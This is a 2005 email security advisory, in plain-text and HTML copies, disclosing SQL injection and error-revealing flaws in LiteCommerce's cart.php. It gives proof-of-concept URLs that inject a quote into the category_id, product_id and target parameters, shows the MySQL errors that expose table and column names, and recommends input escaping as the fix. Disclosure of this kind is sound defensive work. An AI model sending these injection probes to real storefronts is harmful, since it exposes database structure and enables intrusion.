This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C53B05.B7FB4460 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: LiteCommerce Sql injection and reveling errors vulnerability Date: 07/04/2005 Vendor: LiteCommerce Vendor Website: http://www.litecommerce.com Summary: LiteCommerce Sql injection and reveling errors vulnerability Proof of Concept Exploits:=20 http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EX= POSURE http://localhost/test/cart.php?target=3Dcategory&category_id=3D'SQL_INJEC= TION SQL INJECTION 1064: You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT = category_id,image_width,image_height,name,description,meta_tags,enable = d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t = ype FROM xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY = order_by, name This reveals coloumn, table information thus is very high risk and easy = to exploit http://localhost/test/cart.php?target=3Dproduct&product_id=3D'SQL_INJECTI= ON&category_id=3D246 SQL INJECTION 1064: You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near 'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT = inventory_id,amount,low_avail_limit,enabled,order_by FROM = xlite_inventories WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. ------=_NextPart_000_0005_01C53B05.B7FB4460 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Dcrab 's Security Advisory
[Hsc = Security Group]=20 http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/=

Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc. Learn more at http://www.digitalpara= dox.org/services.ah

Severity: High
Title: LiteCommerce = Sql injection=20 and reveling errors vulnerability
Date: 07/04/2005

Vendor: LiteCommerce
Vendor Website: = http://www.litecommerce.com
S= ummary:=20 LiteCommerce Sql injection and reveling errors = vulnerability

Proof of Concept Exploits: =

http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOS= UREPHP_SCRIPT_EXPOSURE

http://localhost/test/cart.php?target=3Dcategory&cate= gory_id=3D'SQL_INJECTION
SQL=20 INJECTION

1064: You have an error in your SQL syntax. Check the manual that=20 corresponds to your MySQL server version for the right syntax to use = near=20 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT=20 category_id,image_width,image_height,name,description,meta_tags,enable=20 d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t = ype FROM=20 xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY = order_by,=20 name
This reveals coloumn, table information thus is very high risk = and easy=20 to exploit

http://localhost/test/cart.php?targ= et=3Dproduct&product_id=3D'SQL_INJECTION&category_id=3D246SQL=20 INJECTION
1064: You have an error in your SQL syntax. Check the = manual=20 that corresponds to your MySQL server version for the right syntax to = use near=20 'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT=20 inventory_id,amount,low_avail_limit,enabled,order_by FROM = xlite_inventories=20 WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1

Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. = Lookout for my=20 soon to come out book on Secure coding with php.

------=_NextPart_000_0005_01C53B05.B7FB4460--